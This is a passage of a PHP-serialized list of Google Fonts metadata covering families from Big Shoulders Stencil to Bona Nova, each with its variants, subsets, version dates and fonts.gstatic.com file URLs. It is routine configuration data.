c.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_5U_PKHznJucP9w.ttf\";s:3:\"700\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_3E_PKHznJucP9w.ttf\";s:3:\"800\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_u0_PKHznJucP9w.ttf\";s:3:\"900\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_kk_PKHznJucP9w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:170;O:8:\"stdClass\":8:{s:6:\"family\";s:26:\"Big Shoulders Stencil Text\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGR04XIGS_Py_AWbQ.ttf\";s:3:\"200\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRU4TIGS_Py_AWbQ.ttf\";s:3:\"300\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRjYTIGS_Py_AWbQ.ttf\";s:7:\"regular\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGR04TIGS_Py_AWbQ.ttf\";s:3:\"500\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGR4YTIGS_Py_AWbQ.ttf\";s:3:\"600\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRDYPIGS_Py_AWbQ.ttf\";s:3:\"700\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRNIPIGS_Py_AWbQ.ttf\";s:3:\"800\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGRU4PIGS_Py_AWbQ.ttf\";s:3:\"900\";s:129:\"http://fonts.gstatic.com/s/bigshouldersstenciltext/v21/5aUV9-i2oxDMNwY3dHfW7UAt3Q453SM15wNj53bCcab2SJYLLUtk1OGReoPIGS_Py_AWbQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:171;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Big Shoulders Text\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Y-r3TIPNl6P2pc.ttf\";s:3:\"200\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Q-q3TIPNl6P2pc.ttf\";s:3:\"300\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3dGq3TIPNl6P2pc.ttf\";s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Y-q3TIPNl6P2pc.ttf\";s:3:\"500\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3b2q3TIPNl6P2pc.ttf\";s:3:\"600\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3VGt3TIPNl6P2pc.ttf\";s:3:\"700\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Wit3TIPNl6P2pc.ttf\";s:3:\"800\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Q-t3TIPNl6P2pc.ttf\";s:3:\"900\";s:111:\"http://fonts.gstatic.com/s/bigshoulderstext/v17/55xEezRtP9G3CGPIf49hxc8P0eytUxB2l66LmF6xc3kA3Sat3TIPNl6P2pc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:172;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Bigelow Rules\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/bigelowrules/v23/RrQWboly8iR_I3KWSzeRuN0zT4cCH8WAJVk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:173;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Bigshot One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/bigshotone/v25/u-470qukhRkkO6BD_7cM_gxuUQJBXv_-.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:174;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Bilbo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/bilbo/v20/o-0EIpgpwWwZ210hpIRz4wxE.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:175;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Bilbo Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/bilboswashcaps/v22/zrf-0GXbz-H3Wb4XBsGrTgq2PVmdqAPopiRfKp8.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:176;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"BioRhyme\";s:8:\"variants\";a:5:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"200\";s:76:\"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ESOjnGAq8Sk1PoH.ttf\";s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ETqjXGAq8Sk1PoH.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/biorhyme/v12/1cXwaULHBpDMsHYW_HxGpVWIgNit.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ET6inGAq8Sk1PoH.ttf\";s:3:\"800\";s:76:\"http://fonts.gstatic.com/s/biorhyme/v12/1cX3aULHBpDMsHYW_ETmiXGAq8Sk1PoH.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:177;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"BioRhyme Expanded\";s:8:\"variants\";a:5:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9LjbffxxcblSHSdTXrb_z.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9Ljbffxw4bVSHSdTXrb_z.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dQIE1zZzytGswgU577CDY9LjbffySURXCPYsje.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9LjbffxwoalSHSdTXrb_z.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/biorhymeexpanded/v19/i7dVIE1zZzytGswgU577CDY9Ljbffxw0aVSHSdTXrb_z.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:178;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Birthstone\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/birthstone/v10/8AtsGs2xO4yLRhy87sv_HLn5jRfZHzM.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:179;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Birthstone Bounce\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"500\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/birthstonebounce/v9/ga6XaxZF43lIvTWrktHOTBJZGH7dEeVJGIMYDo_8.ttf\";s:3:\"500\";s:95:\"http://fonts.gstatic.com/s/birthstonebounce/v9/ga6SaxZF43lIvTWrktHOTBJZGH7dEd29MacQJZP1LmD9.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:180;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Biryani\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddYQyGTBSU-J-RxQ.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddeAxGTBSU-J-RxQ.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/biryani/v13/hv-WlzNxIFoO84YdTUwZPTh5T-s.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddZQ3GTBSU-J-RxQ.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84YddfA2GTBSU-J-RxQ.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84Yddew1GTBSU-J-RxQ.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/biryani/v13/hv-TlzNxIFoO84Yddcg0GTBSU-J-RxQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:181;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Bitter\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8fbeCL_EXFh2reU.ttf\";s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8XbfCL_EXFh2reU.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8ajfCL_EXFh2reU.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8fbfCL_EXFh2reU.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8cTfCL_EXFh2reU.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8SjYCL_EXFh2reU.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8RHYCL_EXFh2reU.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8XbYCL_EXFh2reU.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/bitter/v28/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8V_YCL_EXFh2reU.ttf\";s:9:\"100italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c4P3OWHpzveWxBw.ttf\";s:9:\"200italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cYPzOWHpzveWxBw.ttf\";s:9:\"300italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cvvzOWHpzveWxBw.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c4PzOWHpzveWxBw.ttf\";s:9:\"500italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c0vzOWHpzveWxBw.ttf\";s:9:\"600italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cPvvOWHpzveWxBw.ttf\";s:9:\"700italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cB_vOWHpzveWxBw.ttf\";s:9:\"800italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cYPvOWHpzveWxBw.ttf\";s:9:\"900italic\";s:88:\"http://fonts.gstatic.com/s/bitter/v28/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cSfvOWHpzveWxBw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:182;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Black And White Picture\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/blackandwhitepicture/v22/TwMe-JAERlQd3ooUHBUXGmrmioKjjnRSFO-NqI5HbcMi-yWY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:183;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Black Han Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/blackhansans/v15/ea8Aad44WunzF9a-dL6toA8r8nqVIXSkH-Hc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:184;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Black Ops One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/blackopsone/v20/qWcsB6-ypo7xBdr6Xshe96H3WDzRtjkho4M.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:185;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Blaka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-05-24\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:64:\"http://fonts.gstatic.com/s/blaka/v3/8vIG7w8722p_6kdr20D2FV5e.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:186;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Blaka Hollow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-05-24\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/blakahollow/v3/MCoUzAL91sjRE2FsKsxUtezYB9oFyW_-oA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:187;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Blaka Ink\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/blakaink/v5/AlZy_zVVtpj22Znag2chdXf4XB0Tow.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:188;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Blinker\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:73:\"http://fonts.gstatic.com/s/blinker/v12/cIf_MaFatEE-VTaP_E2hZEsCkIt9QQ.ttf\";s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_OGARGEsnIJkWL4.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_IWDRGEsnIJkWL4.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/blinker/v12/cIf9MaFatEE-VTaPxCmrYGkHgIs.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_PGFRGEsnIJkWL4.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_JWERGEsnIJkWL4.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_ImHRGEsnIJkWL4.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/blinker/v12/cIf4MaFatEE-VTaP_K2GRGEsnIJkWL4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:189;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Bodoni Moda\";s:8:\"variants\";a:12:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";i:10;s:9:\"800italic\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":12:{s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oU7awIBytVjMYwE.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oXzawIBytVjMYwE.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oZDdwIBytVjMYwE.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oandwIBytVjMYwE.ttf\";s:3:\"800\";s:113:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oc7dwIBytVjMYwE.ttf\";s:3:\"900\";s:113:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT67PxzY382XsXX63LUYL6GYFcan6NJrKp-VPjfJMShrpsGFUt8oefdwIBytVjMYwE.ttf\";s:6:\"italic\";s:116:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZKMN4sXrJcwHqoQ.ttf\";s:9:\"500italic\";s:116:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZGsN4sXrJcwHqoQ.ttf\";s:9:\"600italic\";s:116:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZ9sR4sXrJcwHqoQ.ttf\";s:9:\"700italic\";s:116:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZz8R4sXrJcwHqoQ.ttf\";s:9:\"800italic\";s:116:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZqMR4sXrJcwHqoQ.ttf\";s:9:\"900italic\";s:116:\"http://fonts.gstatic.com/s/bodonimoda/v19/aFT07PxzY382XsXX63LUYJSPUqb0pL6OQqxrZLnVbvZedvJtj-V7tIaZgcR4sXrJcwHqoQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:190;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Bokor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/bokor/v30/m8JcjfpeeaqTiR2WdInbcaxE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:191;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Bona Nova\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:6:\"hebrew\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/bonanova/v10/B50NF7ZCpX7fcHfvIUBJi6hqHK-CLA.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/bonanova/v10/B50LF7ZCpX7fcHfvIUB5iaJuPqqSLJYf.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/bonanova/v10/B50IF7ZCpX7fcHfvIUBxN4dOFISeJY8GgQ.ttf\";}s:8:\"category\";s:5:\"ser